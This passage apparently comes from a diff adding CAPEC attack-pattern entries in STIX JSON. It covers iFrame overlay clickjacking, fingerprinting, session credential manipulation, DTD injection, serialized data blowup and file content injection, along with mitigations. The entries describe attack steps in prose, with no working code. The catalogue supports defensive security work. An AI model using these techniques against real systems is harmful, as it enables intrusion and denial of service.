Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed", + "external_id": "REF-85", + "source_name": "reference_from_CAPEC", + "url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb" + } + ], + "id": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "iFrame Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Craft an iFrame Overlay page: The adversary crafts a malicious iFrame overlay page.

  2. Techniques
    The adversary leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.

Exploit

  1. adversary tricks victim to load the iFrame overlay page: adversary utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.

  2. Techniques
    Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Trick the victim to the malicious site through a cross-site scripting attack.
  3. Trick victim into interacting with the iFrame overlay page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

  4. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversarys' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable iFrames in the Web browser.", + "id": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f004d2c5-c636-4b39-9be8-fbf612902dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. 
Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ceb66f2-318c-41f7-9c7f-8411d9e9db00", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--653bb15f-3973-4933-b573-881524838af8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", + "external_references": [ + { + "external_id": "CAPEC-224", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/224.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Fingerprinting", + "external_id": "45", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617", + "attack-pattern--f40c59ce-f023-4e3e-937e-07fa2b7bc3ec", + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_prerequisites": [ + "A means by which to interact with the target system directly." 
+ ], + "x_capec_resources_required": [ + "If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler." + ], + "x_capec_skills_required": { + "Medium": "Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", + "id": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-224-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1eb63bf7-b7b2-4e41-9dfa-0544c490911b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "spec_version": "2.1", + "target_ref": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. 
This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. 
By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.", + "external_references": [ + { + "external_id": "CAPEC-227", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/227.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Sustained Client Engagement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. 
The key factor in a sustainment attack are the repeated requests that take longer to process than usual.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934" + ], + "x_capec_prerequisites": [ + "This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame." + ], + "x_capec_resources_required": [ + "To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. 
In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", + "id": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-227-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f425c6e4-a641-4d70-890a-e1583d4defe9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "spec_version": "2.1", + "target_ref": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. 
Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", + "external_references": [ + { + "external_id": "CAPEC-228", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/228.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Ryan Naraine, DoS Flaw in SOAP DTD Parameter, InternetNews.com, 2003--12---15, ITBusiness Edge, Quinstreet Inc.", + "external_id": "REF-86", + "source_name": "reference_from_CAPEC", + "url": "http://www.internetnews.com/dev-news/article.php/3289191" + } + ], + "id": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DTD Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.
  3. Determine use of XML with DTDs: Examine application input to identify XML input that leverage the use of one or more DTDs.

  4. Techniques
    Examine any available documentation for the application that discusses expected XML input.
    Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD.

Exploit

  1. [Craft and inject XML containg malicious DTD payload]

  2. Techniques
    Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.
    Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts.
", + "x_capec_prerequisites": [ + "The target must be running an XML based application that leverages DTDs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa5c2311-5b43-4e21-9d1c-a3f38ff378bc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--683d38cf-120d-459e-b68f-e88ec1e6e9ea", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", + "id": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--696727ca-cfe5-4525-84d1-4285f4a40004", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. 
In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.", + "external_references": [ + { + "external_id": "CAPEC-229", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/229.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "XML Attribute Blowup", + "external_id": "41", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Attribute-Blowup" + } + ], + "id": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data Parameter Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n ", + "\n A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. 
This may lead to denial of service or instability resulting from excessive resource consumption.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests from serialized data.
    Use a browser to manually explore the website and analyze how the application processes requests using serialized data.

Exploit

  1. Launch a Blowup attack: The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.

  2. Techniques
    Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container.", + "id": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigation may limit the number of configuration parameters per dataset.", + "id": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4b0778c-9df8-4c69-a647-540ef4e5f2aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary poisons files with a malicious payload (targeting the file systems accessible by the target software), which may be passed through by standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes, in order to exploit the host's trust in executing remote content, including binary files.", + "external_references": [ + { + "external_id": "CAPEC-23", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "modified": "2022-02-22T00:00:00.000Z", + "name": "File Content Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n " + ], + "x_capec_extended_description": "\n Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. 
